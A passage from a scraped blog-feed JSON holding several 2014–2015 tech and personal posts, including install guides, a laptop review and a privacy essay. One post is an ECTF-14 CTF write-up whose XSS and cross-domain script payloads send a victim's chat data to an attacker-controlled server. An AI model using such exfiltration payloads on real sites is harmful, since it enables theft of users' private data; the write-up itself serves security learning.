suggestion.",[],{"slug":2829,"title":2830,"link":2831,"pubDate":2832,"contentSnippet":2833,"tags":2834,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"thank-you-pat","Thank You Pat","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F01\u002F03\u002Fthank-you-pat\u002F","2015-01-03T00:00:00.000Z","I’m a lazy reader. I’ll often start books and leave them halfway, often juggling 3-4 books at the same time. I read in sprints, often spending a few days just finishing lots of books followed by reading nothing for the next few weeks, perhaps. But that doesn’t mean I don’t appreciate good books. This is the story of how I found my favorite writer, and how I discovered the wonderful books that I enjoy so deeply.\nI don’t write a journal regularly, but if I did, one of my favorite things to do with it is to figure out the little things that matter; to separate out the strands and understand the connections and the motivations behind where I am today\nIt is our choices…that show what we truly are, far more than our abilities.\nAlbus Dumbledore\nWhat I love to do is figure out those tiny choices, and the reasoning behind them that led me to today.\nI read Patrick Rothfuss’s “Name of the Wind” a long time back. It was an amazing book, which I found on a site called bestfantasybooks.com. In my defense, I was an avid Harry Potter fan at the time, looking for similar books, and I’d decided that reading the best fantasy would be good preparation before I could write my own.\nAs it so happens, “Name of the Wind” was a superb book. The kind that made me squirm in delight when I saw that the sequel was already out. So I did what any self-respecting book-lover would do: read it in a single stretch, screwing up my exams in the process. I didn’t sleep much for those few days (its a pretty long book), but I enjoyed every bit of it.\nI started following Pat’s (hilarious) blog, where he often posted tidbits of his life, and came across his review of “The Alloy of Law” by Brandon Sanderson:\n…\nMy last point is that Sanderson has now been added to a very short list of authors. Specifically, the list authors whom I wish to kill so that I might eat their livers and thereby gain their power.\nAny author that Patrick wanted to kill sounded like a great one to read, so I started “The Alloy of Law”. I finished the book in a few short hours. Its paced excellently, and the action keeps on coming. I’d never really read much urban fantasy before, and despite me never having read Mistborn (Alloy is a sequel to the Mistborn trilogy) I was sucked in.\nAnd here I am, counting down the next few days, waiting for the release of Firefight, Sanderson’s next book.\nSo, thank you Pat. Thanks for introducing me to my favorite writer. Thank you for writing those wonderful books, and keep on reviewing all that you love (I’m reading “Through the Woods” next).\nIf you are looking for a nice fat book to read next, I heartily recommend “The Name of the Wind” and “The Way of Kings”.",[],{"slug":2836,"title":2837,"link":2838,"pubDate":2839,"contentSnippet":2840,"tags":2841,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"installing-project-fedena-in-14-04-html","Installing Project Fedena in Ubuntu 14.04","https:\u002F\u002Faboobacker.in\u002F2014\u002F10\u002F30\u002Finstalling-project-fedena-in-14-04.html","2014-10-30T11:06:20.000Z","Modified version of Fedena Installation guide at project fedena website\nInstall Ruby Dependancies\n\nsudo apt-get update\nsudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties\n\n\nInstall Ruby Using RVM\n\nsudo apt-get install libgdbm-dev libncurses5-dev automake libtool bison libffi-dev\ncurl -L https:\u002F\u002Fget.rvm.io | bash -s stable\nsource ~\u002F.rvm\u002Fscripts\u002Frvm\necho \"source ~\u002F.rvm\u002Fscripts\u002Frvm\" >> ~\u002F.bashrc\nrvm install 1.8.7\nrvm use 1.8.7 --default\nruby -v\n\n\nInstall Rails 2.3.5\n\ngem install rails -v 2.3.5\n\n\nSetting up MySQL server\nFedena uses mysql, so run,\n\nsudo apt-get install libmysqlclient-dev mysql-server\n\n\nDo remember the mysql password you set during this step, it is required later\nClone Fedena Source Code\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fprojectfedena\u002Ffedena.git\n\n\n* Setup your database details in the database.yml\n\n\nOpen the file database.yml in the config folder of the fedena soucre. Change the following details:\n\ndatabase: fedena - The name of the database you want to use for fedena\n\nusername: root - Mysql username for fedena\n\npassword: mypass - The password for the above mysql user\n\n\n* Install the rest of the gems\n\n```bash\ngem uninstall -i ~\u002F.rvm\u002Fgems\u002Fruby-1.8.7-head@global rake\ngem install rake -v 0.8.7\ngem install declarative_authorization -v 0.5.1\ngem install i18n -v 0.4.2\ngem install mysql\ngem install rush -v 0.6.8\ngem update --system 1.3.7\n\n\nSet up Fedena databases\nFrom the Fedena source directory in terminal run,\n\nrake db:create\nrake db:migrate\n\n\nfollowed by,\n\nrake fedena:plugins:install_all\n\n\nSet up pdf setings\n\nsudo apt-get install wkhtmltopdf\ncd config\u002Finitializers\ncp wicked_pdf.rb.example wicked_pdf.rb\nvi wicked_pdf.rb\n\n\nnow change :wkhtmltopdf => ‘\u002Fopt\u002Fwkhtmltopdf’, to :wkhtmltopdf => ‘\u002Fusr\u002Fbin\u002Fwkhtmltopdf’,\nsave the file\nSetup Email\n\ncd config\ncp smtp_settings.yml.example smtp_settings.yml\nvi smtp_settings.yml\n\n\nAdd your settings and save the file\nSetup Sms\n\ncd config\nvi sms_settings.yml\n\n\nAdd your settings and save the file\nChange permissions for scripts\nFrom the same directory grant executable permissions for the files in script directory by,\n\nchmod +x script\u002F*\n\n\nRun the inbuilt server\nIf everything went fine till now, you are ready to run fedena server by running the following from fedena source folder,\n\nscript\u002Fserver\n\n\nNote: This guide is for setting development environment , for fedena deployment refer Deploying Fedena in 14.04.",[],{"slug":2843,"title":2844,"link":2845,"pubDate":2846,"contentSnippet":2847,"tags":2848,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"ectf-web400-writeup","ECTF-14 Web400 Writeup","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F10\u002F20\u002Fectf-web400-writeup\u002F","2014-10-20T00:00:00.000Z","We recently participated in ECTF-14 and it was a great experience. Here’s a writeup to the web400 challenge:\nProblem Statement\nThe chat feature was added to Facelook website and to test it, founder of the company had sent a message in chat to the admin. Admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty.\n[Annoying Admin]\nThe challenge consisted of a simple signup and a chat message sending feature, where anyone could send a chat message to anyone. However, on the loading side, the chat message was loaded using Javascript. The code for loading the messages looked like this:\n\nfunction load_messages (id) {\n    $.ajax({\n    url: \"http:\u002F\u002F212.71.235.214:4050\u002Fchat\",\n    data: {\n        sender: id,\n    },\n    success: function( response ) {\n        eval(response);\n    }\n    });\n}\n\n\nThe url above responded as the following:\n\n$('#chat_234').html('');$('#chat_234').append('dream\u003Cbr \u002F>');\n\n\nWhere dream was the message I sent. My first attempt was to break out of the append function, and execute my own javascript, by trivially using a single quote. Unfortunately, the single quote was escaped and removed by the backend.\nNext, I tried using &#x27; instead of a single quote, and it worked:\nMessage Sent: &#x27;+alert(1)+&#x27; \nMessage received: $('#chat_234').html('');$('#chat_234').append('dream\u003Cbr \u002F>');$('#chat_234').append(''+alert(1)+'\u003Cbr \u002F>');\nThis seemed simple enough to exploit as XSS, so I quickly wrote up my exploit:\n$.get(‘\u002Fchat?sender=2’, function(data){\n  $.post(“http:\u002F\u002Fmy-server.com\u002Fectf\u002Findex.php”, {content: data});\n});\nThis utilized the fact that we knew Founder’s user id to be 2. The code worked perfectly fine with my test accounts, but something weird happened when the challenge server (admin) ran it. I would get a GET request on the above mentioned url, instead of a POST. Also attempting to generate the URL using concat or + or any operator such as : \"http:\u002F\u002Fmy-server.com\u002Findex.php?data=\"+document.cookie made a request to http:\u002F\u002Fmy-server.com\u002Findex.php?data=. Anything I appended was just ignored, plain and simple.\nAfter attempting to get a POST request with cookie or session data for a lot of time, I realized that the problem was not XSS, but rather a CSRF attack. This was because the data was being loaded in a Javascript request, instead of JSON. Javascript request (using a script tag) can be made across domains, which meant that any website could access the data by using the proper script tag. We just had to add a script tag with its src set to http:\u002F\u002F212.71.235.214:4050\u002Fchat?sender=2. This would automatically add the chat message to a div with id chat_2.\nThe only issue was that Admin had to visit our site, with proper cookies, and we know already that admin has been sniffing for links and visiting them. So I wrote up my second (this time working) exploit:\n\n\u003C!DOCTYPE html>\n\u003Chtml lang=\"en\">\n\u003Chead>\n  \u003Cmeta charset=\"utf-8\">\n  \u003Ctitle>ECTF14 web400 exploit\u003C\u002Ftitle>\n\u003C\u002Fhead>\n\u003Cbody>\n  \u003Cdiv id=\"chat_2\">\u003C\u002Fdiv>\n  \u003Cdiv id=\"chat_106\">\u003C\u002Fdiv>\n  \u003Cscript src=\"http:\u002F\u002Fcode.jquery.com\u002Fjquery-1.11.0.min.js\">\u003C\u002Fscript>\n  \u003Cscript>\n    $(document).ready(function(){\n      $.getScript(\"http:\u002F\u002F212.71.235.214:4050\u002Fchat?sender=2\");\n      setTimeout(function(){\n        var text = $('#chat_2').text();\n        $.post('http:\u002F\u002F20c7d53b.ngrok.com\u002F', {content:text});\n      }, 1000);\n    })\n  \u003C\u002Fscript>\n\u003C\u002Fbody>\n\u003C\u002Fhtml>\n\n\nUnfortunately, the exploit did not work on Chrome because Chrome refused to run the script as javascript, because it was being served with a mime-type of text\u002Fhtml. It worked in firefox, and I crossed my fingers as I sent out the link to the above page to admin in a chat message. I knew admin user was using PhantomJS to run my javascript (because of the user-agent in numerous GET requests I got earlier). So, I was hopeful that this would work.\nI was listening at the url, and sure enough as soon as I sent a link out to this page, admin ran my javascript and I got the flag in a POST request.\nThe flag was bad_js_is_vulnerable.",[],{"slug":2850,"title":2851,"link":2852,"pubDate":2853,"contentSnippet":2854,"tags":2855,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"apertium-malayalam-english-pair-tools-usage-and-directory-structure-html","Apertium Malayalam-english Pair Tools Usage and Directory Structure","https:\u002F\u002Faboobacker.in\u002F2014\u002F08\u002F20\u002Fapertium-malayalam-english-pair-tools-usage-and-directory-structure.html","2014-08-20T02:03:25.000Z","Apertium malayalam english pair contain two directories\napertium-mal -> conatins malayalam specific rules and resources\napertium-mal-eng ->contains translation rules\nApertium-mal\napertium-mal.mal.lexc  -> contain mono lingual dictionary in lexec format , it is contain morphotactics rules\napertium-mal.mal.twol -> contain morphophonology rules (changes when morphemes are joined together)\napertium-mal.mal.tsx ->tag set to train the tagger\napertium-mal.mal.rlx  -> constarint grammar rules\nApertium-mal-eng\napertium-mal-eng.eng.dix -> mono lingual dictionary for english in lttoolbox format\napertium-mal-eng.post-eng.dix -> English post generator\napertium-mal-eng.eng-mal.t1x – > english to malayalam chunker\napertium-mal-eng.eng-mal.t2x -> english to malayalam interchunk\napertium-mal-eng.eng-mal.t3x ->english to malayalam post chunk\nTranslation\n\ncd apertium-mal-eng\necho “മലയാളം വാക്യം ” | apertium -d . mal-eng\n\n\nwhere\n-d . -> directory=current directory\nmal-eng -> malayalam english mode\nMorphological analyser\n\necho “മലയാളം “| lt-proc mal-eng.automorf.bin\n\n\nGUI for translator\n\nStep by step process view (Developer ->Modes viewer)",[],{"slug":2857,"title":2858,"link":2859,"pubDate":2860,"contentSnippet":2861,"tags":2862,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"install-apertium-malayalam-english-pair-development-environment-in-ubuntu-html","Install Apertium Malayalam-english Pair Development Environment in Ubuntu","https:\u002F\u002Faboobacker.in\u002F2014\u002F08\u002F20\u002Finstall-apertium-malayalam-english-pair-development-environment-in-ubuntu.html","2014-08-20T01:43:36.000Z","Apertium is an open source machine translation toolkit .It is an extensible platform so that new language pairs can be added easily . It is currently in incubator state , we have to do a lot to to make it useful for translation of real life examples . I created ppas for the tools to make the process easier\nPlatform : ubuntu :14.04\nAdd repositories\n\nwget http:\u002F\u002Fapertium.projectjj.com\u002Fapt\u002Finstall-nightly.sh -O - | sudo bash\nsudo add-apt-repository ppa:tinodidriksen\u002Fcg3\n\n\nInstall tools\n\nsudo apt-get update\nsudo apt-get -f install locales build-essential automake subversion pkg-config gawk libtool apertium-all-dev\n\n\n\nInstall English Malayalam pair data\n\n\nsvn co https:\u002F\u002Fsvn.code.sf.net\u002Fp\u002Fapertium\u002Fsvn\u002Fincubator\u002Fapertium-mal-eng\u002F\nsvn co https:\u002F\u002Fsvn.code.sf.net\u002Fp\u002Fapertium\u002Fsvn\u002Fincubator\u002Fapertium-mal\n\n\nCompile\n\ncd ~\u002Fapertium-mal\n.\u002Fautogen.sh\nmake\ncd ~\u002Fapertium-mal-eng\n.\u002Fautogen.sh --with-lang1=..\u002Fapertium-mal\nmake\n\n\nInstallation is over , now you can test the system using\n\necho \" അവന്‍ നല്ല കുട്ടിയാണ്  \" | apertium -d . mal-eng\n\n\nThis will print\nhe is nice child\nPrefer Graphical user interface ? , you can try my simple gui for it\n\nsudo apt-get install qt5-default espeak\ngit clone https:\u002F\u002Fgithub.com\u002Ftachyons\u002Fmltranslator.git\ncd mltranslator\nqmake\nmake\nsudo make install\n\n\nStuck ? Don’t worry just comment below . :-)",[],{"slug":2864,"title":2865,"link":2866,"pubDate":2867,"contentSnippet":2868,"tags":2869,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"my-public-life","Living a public life as a privacy advocate","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F08\u002F14\u002Fmy-public-life\u002F","2014-08-14T00:00:00.000Z","If you’ve known me for a while, you might know me as a privacy conscious individual or perhaps as someone who leads a very public life. The truth is that I lead both these lives; and while that may sound oxymoronic to some, its perfectly clear to me.\nI’m a huge privacy advocate. I still remember the day I woke up and read about PRISM first thing in the morning. My reaction was a mix of disbelief, anger, and frustration. In the aftermath of the PRISM reveal, I made a few choices: I would retain ownership of my data, and I’ll do whatever I can to promote tools that help you do this.\nI’m still working on both fronts, but the reality of the situation is that we are surrounded by walled gardens. I decided to make the best I could of these gardens. I remember reading a weird suggestion: only post public stuff on facebook; and I was somehow convinced to try it out.\nBut I took the experiment a step further. If the service is something I can’t control myself (say self-hosted), everything I do with it should be for public-viewing. Since then, I’ve rarely posted anything private on facebook.\nOther services where I follow the same advice include:\nGoodreads - Whatever I read is public information, along with real-time updates of my reading habits.\nLast.FM - All my music tastes, along with real-time upates on what I’m listening to.\nFacebook - All of my posts on facebook are public. I do have some private messaging interactions on facebook (I never initiate them) and usually move them to email if they grow important.\nTwitter - Tiny byte-sized thoughts and observations are again, public. My account is set to public, which doesn’t mean that I trust twitter with my data. It just means that I expect my data to be public.\nGitHub - One of the few companies I trust to keep my data safe. Barring a few exceptions, everything I do on github is public, ready for anyone to analyze and use as public data. In fact, github makes all of its timeline data available to public as a dataset on bigquery.\nBookmarks - Most of my bookmarks are public via xmarks. I haven’t synced it in a while since XMarks and Chrome Sync don’t work well together, but plan to do something about this as well.\nAlong with all this, most of the writing I do these days is for public consumption, either via my Blog, or some platform like Quora, StackExchange, or Medium.\nWhy\nMy reasoning behind keeping all of my online life public is twofold:\nThis creates a public archive of my life, accessible to everyone.\nIt doesn’t give me an illusion of privacy when there is none.\nIn reference to (1) above, I recently setup Google Inactive Accounts, and have to commend Google on the execution of the concept. Be sure to check it out at https:\u002F\u002Fwww.google.com\u002Fsettings\u002Faccount\u002Finactive.\nDisadvantages\nThis lifestyle choice is not without its comebacks. Stalking me, for example, is very easy. So is probably impersonating me as well. However, these are risks I’m willing to take in order to lead a public life.\nExceptions\nBy now you might be thinking of me as a pro-facebook share-everything kind of guy. But that’s not completely true. I do have clear limits on what counts as public and what does not. I value my privacy (and that of those close to me) very dearly.\nFor instance, I count my photographs as something very private. I almost never post public updates anywhere with my picture in it. Perhaps its because I never had any phone with decent camera. Whatever the reason, I try really hard to keep my pictures off the internet.\nAnother related issue is when the update would involve someone beside me. For example, my sister was recently engaged and I didn’t go on a social update spree telling the whole world about it, because I value her privacy.\nMy simple rule of thumb is to ask for permission, rather than beg for forgiveness as a person’s privacy is far more important.",[],{"slug":2871,"title":2872,"link":2873,"pubDate":2874,"contentSnippet":2875,"tags":2876,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"first-project-on-github","What was the first project on GitHub?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F08\u002F02\u002Ffirst-project-on-github\u002F","2014-08-02T00:00:00.000Z","Note: This is cross-posted from Quora where I wrote this answer initially.\nThe first project on GitHub was grit. How do I know this? Just some clever use of the search and API.\nHere’s a GitHub search to see the first 10 projects that were created on GitHub. The search uses the created keyword, and searches for projects created before 15 Jan 2008.\nThey are (in order of creation) (numeric id of repo in brackets):\nmojombo\u002Fgrit (1)\n    \nGrit gives you object oriented read\u002Fwrite access to Git repositories via Ruby.\nDeprecated in favor of libgit2\u002Frugged\nwycats\u002Fmerb-core (26)\n    \nMerb Core: All you need. None you don’t.\nMerb was an early ruby framework that was merged to Rails\nNo longer maintained.\nrubinius\u002Frubinius (27)\n    \nRubinius, the Ruby Environment\nStill under active development\nmojombo\u002Fgod (28)\n    \nGod is an easy to configure, easy to extend monitoring framework written in Ruby.\nStill actively maintained, and use by GitHub internally as well, I think\nvanpelt\u002Fjsawesome(29)\n    \nJSAwesome provides a powerful JSON based DSL for creating interactive forms.\nIts last update was in 2008\nwycats\u002Fjspec (31)\n    \nA JavaScript BDD Testing Library\nNo longer maintained\ndefunkt\u002Fexception_logger (35)\n    \nThe Exception Logger logs your Rails exceptions in the database and provides a funky web interface to manage them.\nNo longer maintained>\ndefunkt\u002Fambition (36)\ntechnoweenie\u002Frestful-authentication (42)\n    \nGenerates common user authentication code for Rails\u002FMerb, with a full test\u002Funit and rspec suite and optional Acts as State Machine support built-in.Maintained till Aug 2011\ntechnoweenie\u002Fattachment_fu (43)\n    \nTreat an ActiveRecord model as a file attachment, storing its patch, size, content type, etc.\nI’m sure the id from 2-25 would be taken up by many of the internal GitHub projects, such as github\u002Fgithub. To get the numeric id of a repo, visit https:\u002F\u002Fapi.github.com\u002Frepos\u002Fmojombo\u002Fgrit and change the URL accordingly.",[],{"slug":2878,"title":2879,"link":2880,"pubDate":2881,"contentSnippet":2882,"tags":2883,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"how-does-sdslabs-co-in-work","How does the sdslabs.co.in domain name work?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F07\u002F27\u002Fhow-does-sdslabs-co-in-work\u002F","2014-07-27T00:00:00.000Z","A very common asked question is about our domain name and how does it work locally. When we launched filepanda, and our preliminary homepage a long time ago, we had been using the easy to remember IP address http:\u002F\u002F192.168.208.208.\nNow, however we are using the domain name sdslabs.co.in for all our services, including DC. To understand how this works, you will have to understand how the name resolution of a domain name takes place.\nThe Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities.\n- Wikipedia\nDNS is basically a service which resolves domain names to IP addresses. If you own a domain name, you can point it to wherever you want. This is usually done in the administration panel of your hosting services. We have setup multiple domains on our nameserver (mitsu.in as of the moment) to point to the IP address 192.168.208.x.\nFor instance sdslabs.co.in points to 192.168.208.208, echo.sdslabs.co.in points to 192.168.208.204 and so on. This is done via updating something called A records (this is the part of resolution which transaltes to IPv4 addresses).\nThe benifits of having such a system in place are enormous:\nUsers don’t have to remember IP addresses, and can easily remember the site address.\nWe can move around services, applications over different machines, and it will only take a single update to change the name resolutions\nWe could add alternative fallback servers easily (by having multiple A record entries) for a domain. We could even use this to point sdslabs.co.in domain to something that is hosted online, for instance.\nWe can have catchy, and simple to remember urls for eg https:\u002F\u002Fsdslabs.co.in\u002Flogin, and https:\u002F\u002Fsdslabs.co.in\u002Flogout\nAlso, we are running all our services on https, which is not dependent upon the visibility of the website. Even though the site is hosted locally, the process of certificate signing remains exactly the same as any other site. Once we aquire a SSL certificate and attach it to our web-server, the visibility of the domain does not matter to the browser at all.\nNote: For the benifit of those not in IIT Roorkee, we are running multiple web-service on the domain sdslabs.co.in, which is only served locally, as it resolves to a local IP address (192.168.208.208)\nCaveat: Several DNS servers wil block RFC1913 responses by default (basically any DNS response in the private IP ranges). This is usually disabled in the intranet scenarios, but something to keep in mind if you’re looking to use this solution.",[],{"slug":2885,"title":2886,"link":2887,"pubDate":2888,"contentSnippet":2889,"tags":2890,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"back-to-rails","Coming back to rails","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F07\u002F11\u002Fback-to-rails\u002F","2014-07-11T00:00:00.000Z","I’ve \nworked with rails previously before\n, but that was a long time back\nand even though I’ve continued to dabble with it, \nI’d never built anything complete or large enough with it. This time,\nhowever, I’m working on an actual large-scale application with all the \nnuts-and-bolts that make rails such a pleasure to work with. Since\nI’m coming back to rails after such a long time, I thought I’d document\nsome of the cool new features that I’ve found in rails this time around.\nSpring\nOne of the major discomforts of working with rails on the\ncommand line was that it is heavy and slow. Spring works behind\nthe scenes on the second issue, namely speed. Here’s how the\nproject’s README describes itself:\nSpring is a Rails application preloader. It speeds up development \nby keeping your application running in the background so you don’t \nneed to boot it every time you run a test, rake task or migration.\nYou can update all the binaries in your PROJECT_ROOT\u002Fbin\u002F directory\n(which include rails, bundle and rake) to make use of spring\nby executing the following command:\n\nbundle exec spring binstub --all\n\n\nAny further execs (such as .\u002Fbin\u002Frake -T) will make use of\nthe spring pre-loader leading to much faster startup times. You can even\nuse spring against the default system binaries by prefixing the commands\nwith spring, such as spring rake -T.\nResque-Scheduler\nI needed a job queue for background tasks and polling API\nservices, and what better tool to use than resque. I’m using it in combination\nwith  resque-scheduler for\nrunning tasks on cron. How it works is that in addition to your main rails\nserver and a long running resque job process, a separate resque-scheduler\nrake task is kept running, which loads up the schedule and inserts\ntasks accordingly into the resque queue as per the schedule.\nFor those new to resque in general, you can start the two processes by:\nQUEUE=* rake environment resque:work #To start resque\nrake resque:scheduler\n\n\nNote that we are pre-loading the rails environment in the resque:work task as\nit will load rails for you across all of your tasks. Also note that you\nwill need the following two lines in your Rakefile to get these tasks to run:\nrequire 'resque\u002Ftasks'\nrequire 'resque\u002Fscheduler\u002Ftasks'\n\n\nAlso remember to define the resque:setup task according to the \nresque-scheduler README, which would load the schedule and config as needed.\nThis blog post is a work-in-progress and I will continue to update it with\nbits of rails-foo as I learn more.\nRake-notes\nI’d never tried using notes before, and as it turns out, using rake:notes\nis easy and super-awesome. Its allows you to spread your notes about TODOs, FIXMEs and such throughout your codebase and take a bird-eye’s look at them with just a single command.\nRead more about it at http:\u002F\u002Fsiong1987.com\u002Fposts\u002Fpowerful-and-hidden-rake-notes-in-rails\u002F",[],{"slug":2892,"title":2893,"link":2894,"pubDate":2895,"contentSnippet":2896,"tags":2897,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"galago-ultra-pro-review","A month with the System76 Galago Ultra Pro","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F07\u002F04\u002Fgalago-ultra-pro-review\u002F","2014-07-04T00:00:00.000Z","With my recent CCTC Winnings, I decided to purchase a new laptop as my old Dell Inspiron was not performing up to the mark. Being of a time before the Intel i-series launch, it was also severely lacking in several features, most notably virtualization support, which is badly needed these days.\nAfter taking a thorough look at the various offerings in the market (and being disappointed by most of them), I decided to go with the [System Galago Ultra Pro][galago] for the following reasons:\nLinux Support (Just Ubuntu actually, but its nice to have a laptop that supports and comes with Linux pre-installed).\nIntel HD 5200 Graphic Card. Even though the nVidia\u002FATI support has been getting better in Linux these days, I wanted a graphic card that I could use without worry, for both playing games, using webGL without having to worry about things like overheating and switching card modes (optimus\u002Fbumblebee and whatnot).\nHaswell. Not many manufacturers are currently offering Haswell lineups, and System76 is one of the few with them in the market.\nThe other few machines I did consider included the Apple MBP, Lenovo Ideapad, Dell Sputnik 13. The MBP was rejected because I wanted a Linux machine, and it was overly costly; the Ideapad had a touch screen, which I abhor; and finally the Sputnik is too expensive as well.\nA few other machines were rejected because I was exclusively looking for a 14-inch screen, due in part to my experience with my previous bulky machine.\nHardware Review\nThe build quality of the Galago is above average, but its still a flimsy offering, when compared to the MBP or other business class offerings such as the Vostro. A lot of the Galago reviews on the internet talk about the defective keyboards, but I faced no such issues. It seems to have been fixed, and the keyboard has been iterated several times since, I think.\nThe IPS screen (1920x1080) is a real gem, and I’ve gotten used to watching everything in full HD these days. The laptop has 2 small fans on the lower side, and they hardly ever kick in, making it a quiet laptop. The only times it heats up much is when I’m playing demanding games or doing something GPU intensive. A few issues that I’ve actually faced with it include:\nThe Esc key not responding to all presses. I have to hit it with a slightly extra pressure for each keypress to register. However, this is just a quirk I’ve come to accept, and work around. My muscle memory soon overtook and I’m now used to pressing it hard.\nMissing Media keys. It does have the usual Mute, Volume, and the Play\u002FPause keys, but the next\u002Fprevious media keys are missing on the keyboard.\nThe charger getting heated up (a lot). It even heats up when the charger is not connected to the laptop.\nThe inbuilt speaker quality is definitely not above average. I usually use my earphones with it, so its not much trouble to me anyway.\nThe “clickpad” becomes a “touchpad” in Windows, which means drag-drop becomes extremely uncomfortable if you’re not used to it. I’ve installed the official touchpad drivers in Windows from knowledge76, but I could not find a setting to use “clicks” instead of “touch”.\nAs an aside, I really like the keyboard layout (I don’t like numeric keypads much) and the placement of Del-End keys, which is incidentally same as my previous laptop. I really dislike those layouts where you have to press a combination of Fn+Some key just to trigger Page Up\u002FDown. A note to laptop manufacturers : Please stop messing with the keyboards.\nHaving a branded Ubuntu key is also a good show-off at some places :) I also have to mention that the laptop is very silent. The fans rarely kick in, and I have faced no heating issues so far.\nSoftware Side\nDespite being built for Linux, I’ve still faced a few software issues on Linux. None of these are a deal-breaker though for me. The first time I realized that it wasn’t really built for Linux was when I booted using my external to Ubuntu 12.04 and the WiFi didn’t work. Apparently you need a combination of System 76 custom (though open-source) drivers and 14.04 on this machine to get the drivers to work. This is one of the reasons I haven’t downgraded to Elementary Luna (which is based on Ubuntu 12.04). The issues I’ve faced (along with my workarounds) include:\nFlash not working on Google Chrome Stable. I talked to System76 support over this, and I’m yet to get it working. As a workaround, I’ve been using Google Chrome Unstable (which I usually use anyway), and it detects flash fine.\nWebGL support in Chrome is a bit sketchy. Chrome stable doesn’t detect the graphic card as supported, while the Chrome Unstable version did detect it as working for a while, but the graphic card was either removed from the whitelist, or added to the blacklist in a future update, making it non-working again. Currently, I’m using the “Disable WebGL Blacklist” flag from chrome:\u002F\u002Fflags to get it working.\nWebcam not being detected. This has gotten me a bit puzzled. It was working fine on the fresh Ubuntu 14.04 setup, but some driver issue is preventing it from working now. I think a dist-upgrade should fix it, but I’m not sure. I might try to re-install the system76-driver package if that doesn’t work. Update: It started working again after just a restart.\nAnother minor issue I face is that the brightness key on the keyboard (Fn+F8\u002FF9) allows you to take the brightness level all the way down to zero. So you could make your screen pitch-black, with absolutely no idea how to get it back to normal. This happens only on ubuntu, though.\nOverall\nDespite its few quirks, I’m liking my new laptop. I’m enjoying gaming on it (on both Linux and Windows), and it has more than enough power to run whatever combination of VMs I want to.\nGaming\nAll the Linux games from my various Humble Bundle purchases are finally being put to good use. The only game that I haven’t been able to run is Oilrush, which doesn’t support Intel Graphic cards on Linux for some reason. Some of the games that I’ve tried and enjoy on Linux include:\nMark of the ninja\nThe Swapper\nDon’t Starve\nFez\nBit Trip Runner 2\nCounter Strike: Source\nPortal\nHalf-Life 2\nCivilization 5\nTrine 2\nMinecraft\nTrine 2 does show some noticable lag on full settings, but its not supported on Intel drivers anyway. Rest of the games run wonderfully on full settings.\nI haven’t tried gaming much on Windows, but I do play Blur (admittedly a 3 year old game) sometimes on it at the highest settings.\nSpecs\nThe only thing I upgraded in my laptop was an increase in RAM from the default of 4GB to 8GB, primarily because I intend to run lots of VMs on this machine. The rest is same as the specs on the official site (scroll to bottom):\n\nProcessor: Intel(R) Core(TM) i7-4750HQ CPU @ 2.00GHz\nRAM: Samsung, SODIMM DDR3 Synchronous 1600 MHz (0.6 ns), M471B5173QH0-YK0 (4GiB) x2\nGraphic Card: Intel Iris Pro Graphics 5200 with 128 MB eDRAM, Crystal Well Integrated Graphics Controller\nHard Disk:  Western Digital, WDC WD5000LPVX-2, 500GB (465GiB)\nMemory: 8GB 204 pin Dual Channel DDR3 @ 1600 MHz (2x4GB)\nIntel ME Version: 9.0.20.1447\n\n\nIf you’re interested in getting any further details about the laptop, feel free to contact me.",[],{"slug":2899,"title":2900,"link":2901,"pubDate":2902,"contentSnippet":2903,"tags":2904,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cctc-wave-3","Deloitte CCTC Wave III","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F06\u002F03\u002Fcctc-wave-3\u002F","2014-06-03T00:00:00.000Z","I was winner of the Deloitte CCTC Wave I, and a finalist for the Wave II.\nIt was natural I was participating this year as well. While the first year\ninvolved a simple penetration test as the first round, and it was an abstract\nsubmission in Wave II; this time it was a closed jeopardy-style CTF contest\nbetween different teams from various colleges.\nThere were altogether more than 30 teams participating in the CTF. I was lucky\nto have teammates like Abhishek Das(CCTC Wave II Winner) and Ravi Kishore\nwho endured through several challenges when I gave up.\nWe’ve published all challenges over on GitHub along with writeups and problems\nbeing made available wherever we can.\nThe challenges ranged from very easy to difficult to absurd trivia. We topped\nthe round with the most number of points across the board, making sure we got\nthe +30 bonus for solving first on all but 2 challenges out of 13.\nWe’ll be leaving for Hyderabad for the finals in the first week of April. Wish us\nluck, will you.\nUpdate: We won the final event at Hyderabad as well. More details (and a pic) on our blog post on SDSLabs here.",[],{"slug":2906,"title":2907,"link":2908,"pubDate":2909,"contentSnippet":2910,"tags":2911,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"backdoor-and-quizzes","BackdoorCTF and Quizzes","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F03\u002F25\u002Fbackdoor-and-quizzes\u002F","2014-03-25T00:00:00.000Z","I recently hosted a Geek Quiz at my college along with Giri. The quiz\nwas mostly geek with some sports and pop-cult trivia. Here are the slides for\nthe 